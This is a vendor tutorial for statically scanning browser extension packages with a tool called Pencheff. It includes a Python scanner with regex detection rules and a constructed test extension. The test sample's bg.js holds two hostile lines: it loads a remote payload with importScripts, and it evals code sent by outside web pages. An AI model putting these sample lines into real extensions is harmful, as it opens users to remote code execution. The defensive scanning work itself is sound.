Tutorial: Browser extension security scanning
Statically analyze a browser extension package. Pencheff strips the CRX header, unpacks the ZIP, and scores the manifest, scripts, and resources — the analysis CRXcavator pioneered, extended with modern exfiltration and obfuscation checks.
Scenario
- Artifact. acme-extension.crx (Chrome/Edge) or .xpi (Firefox), or a zipped unpacked extension, hosted at a URL you control.
- Goal. A risk profile — over-broad permissions, weak CSP, remote-code loading, DOM injection sinks, and embedded secrets.
Inputs you need
| Item | Where it goes |
|---|---|
| Artifact URL (.crx / .xpi / .zip) | Artifact URL field |
| SHA-256 of the file | SHA-256 field — integrity gate |
Compute the digest locally on the exact file you are publishing, so the scanner can refuse a swapped or corrupted download:

```sh
shasum -a 256 acme-extension.crx
```

Time budget
| Phase | Wall time |
|---|---|
| Fetch + verify + unpack | < 1 min |
| Manifest + code + secrets analysis | < 1 min |
| Total | ~1–2 min |
Steps
1. Register the target
app.pencheff.com → Register target → Mobile & Client Security → Browser Extension:
- Name — Acme extension — v3.2
- Artifact URL — https://builds.acme.com/acme-extension.crx
- SHA-256 — the digest from above
2. Run the scan
Commission scan. Pencheff verifies the download against the registered SHA-256, strips the CRX Cr24 header (CRX2/CRX3) to recover the ZIP (.xpi and .zip artifacts are already plain ZIPs), and analyzes:
- manifest.json — permission risk (debugger, cookies, <all_urls>, proxy = critical; tabs, nativeMessaging, management = sensitive), broad host_permissions, weak content_security_policy (unsafe-eval / unsafe-inline), broad externally_connectable, content-script injection surface (the matches patterns under content_scripts), and MV2 deprecation.
- bundled JS/HTML — DOM sinks (eval, new Function, .innerHTML, document.write), remote-code loading (importScripts() of a remote URL, remote <script src> — banned under MV3), and external message handlers (runtime.onMessageExternal / onConnectExternal).
- secrets — hardcoded keys/tokens across the bundle.
The extension is never loaded in a browser: this is static analysis of the package only, so runtime-only behaviour (code fetched after install, dynamically built URLs) is out of scope.
3. Read the findings
Findings are tagged extension_misconfig and extension_secrets, each
with severity, CWE, the manifest key or script file, and remediation.
Manifest V2 packages are flagged as a deprecated, weaker security model. Remote-code loading is the highest-severity pattern — it’s the classic supply-chain vector (e.g. the Cyberhaven incident) and is banned under Manifest V3.
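To make the checks above concrete, here is an added example (not Pencheff's own engine or code from this page) of the same pipeline in Python: strip the CRX2/CRX3 header, open the ZIP, score manifest.json with the permission, host, CSP and externally_connectable rules listed in step 2, and grep bundled scripts for the DOM sinks and remote-code loads. The sample CRX it builds is constructed in memory, and its CRX3 "header" is dummy bytes of the declared length rather than a real signed protobuf; the severity labels are this example's own mapping of the critical/sensitive tiers, and no signature is verified.

```python
"""Added example: static triage of a CRX/XPI/ZIP extension package.
Rules follow the tutorial text; the thresholds and severities are this
example's assumptions, not Pencheff's scoring."""
import io
import json
import re
import struct
import zipfile

# <all_urls> is handled as a broad host pattern (critical) so it is reported once.
CRITICAL_PERMS = {"debugger", "cookies", "proxy"}
SENSITIVE_PERMS = {"tabs", "nativeMessaging", "management"}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
SINKS = [  # (regex over JS/HTML text, finding label, severity)
    (re.compile(r"\beval\s*\("), "eval", "high"),
    (re.compile(r"\bnew\s+Function\s*\("), "new Function", "high"),
    (re.compile(r"\.innerHTML\s*="), "innerHTML", "high"),
    (re.compile(r"document\.write\s*\("), "document.write", "high"),
    (re.compile(r"importScripts\s*\(\s*['\"]https?://"), "remote importScripts", "critical"),
    (re.compile(r"<script[^>]+src\s*=\s*['\"]https?://"), "remote <script src>", "critical"),
]


def strip_crx_header(data: bytes) -> bytes:
    """Return the ZIP payload of a CRX2 or CRX3 file. Signature is NOT verified."""
    if data[:4] != b"Cr24":
        raise ValueError("not a CRX file: missing Cr24 magic")
    version, = struct.unpack_from("<I", data, 4)
    if version == 2:  # magic | version | key_len | sig_len | key | sig | zip
        key_len, sig_len = struct.unpack_from("<II", data, 8)
        return data[16 + key_len + sig_len:]
    if version == 3:  # magic | version | header_len | protobuf header | zip
        header_len, = struct.unpack_from("<I", data, 8)
        return data[12 + header_len:]
    raise ValueError(f"unsupported CRX version {version}")


def unpack(data: bytes) -> zipfile.ZipFile:
    """.xpi and zipped unpacked extensions are plain ZIPs; only .crx needs stripping."""
    payload = data if data[:2] == b"PK" else strip_crx_header(data)
    return zipfile.ZipFile(io.BytesIO(payload))


def score_manifest(m: dict) -> list:
    """Findings as (severity, manifest key, detail) tuples."""
    out = []
    if m.get("manifest_version", 2) < 3:
        out.append(("medium", "manifest_version", "MV2 is deprecated"))
    perms = set(m.get("permissions", [])) | set(m.get("optional_permissions", []))
    # MV2 keeps host patterns inside "permissions"; MV3 moves them to host_permissions.
    hosts = set(m.get("host_permissions", [])) | {p for p in perms if "://" in p or p == "<all_urls>"}
    out += [("critical", "permissions", p) for p in sorted(perms & CRITICAL_PERMS)]
    out += [("high", "permissions", p) for p in sorted(perms & SENSITIVE_PERMS)]
    if hosts & BROAD_HOSTS:
        out.append(("critical", "host_permissions", "broad host access"))
    csp = m.get("content_security_policy", "")
    if isinstance(csp, dict):  # MV3 form: {"extension_pages": "...", "sandbox": "..."}
        csp = " ".join(csp.values())
    out += [("high", "content_security_policy", bad) for bad in ("unsafe-eval", "unsafe-inline") if bad in csp]
    if set(m.get("externally_connectable", {}).get("matches", [])) & BROAD_HOSTS:
        out.append(("high", "externally_connectable", "any web page may message the extension"))
    return out


def scan_scripts(zf: zipfile.ZipFile) -> list:
    """Findings as (severity, 'file:line', sink label) for every bundled JS/HTML file."""
    out = []
    for name in zf.namelist():
        if not name.endswith((".js", ".html")):
            continue
        text = zf.read(name).decode("utf-8", "replace")
        for pat, label, sev in SINKS:
            for hit in pat.finditer(text):
                out.append((sev, f"{name}:{text.count(chr(10), 0, hit.start()) + 1}", label))
    return out


def analyze_package(data: bytes) -> list:
    zf = unpack(data)
    return score_manifest(json.loads(zf.read("manifest.json"))) + scan_scripts(zf)


def build_sample_crx() -> bytes:
    """Constructed artifact: a CRX3 framing around a deliberately risky MV3 extension."""
    manifest = {
        "manifest_version": 3, "name": "sample", "version": "1.0",
        "permissions": ["tabs", "cookies", "storage"],
        "host_permissions": ["<all_urls>"],
        "content_security_policy": {"extension_pages": "script-src 'self' 'unsafe-eval'; object-src 'self'"},
        "externally_connectable": {"matches": ["*://*/*"]},
        "background": {"service_worker": "bg.js"},
    }
    bg = ("importScripts('https://cdn.example.com/payload.js');\n"
          "chrome.runtime.onMessageExternal.addListener((m) => eval(m.code));\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("manifest.json", json.dumps(manifest))
        zf.writestr("bg.js", bg)
    header = b"\x00" * 16  # placeholder for the real CRX3 protobuf header
    return b"Cr24" + struct.pack("<II", 3, len(header)) + header + buf.getvalue()


if __name__ == "__main__":
    for sev, where, what in analyze_package(build_sample_crx()):
        print(f"{sev:8} {where:28} {what}")
```

Run it on a real artifact with `analyze_package(open("acme-extension.crx", "rb").read())`. Two caveats a scanner must add before trusting this: verify the CRX signature (and your own SHA-256 gate) before unpacking, and treat the regex sinks as leads rather than verdicts, since minified or obfuscated bundles routinely hide `eval` behind string assembly.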
Deliverable
An extension risk register exportable to DOCX/JSON/CSV — useful for allow/deny decisions on third-party extensions in a managed fleet.
Next
- Tutorial: Desktop app static scanning
- Browser Extension Security — feature reference.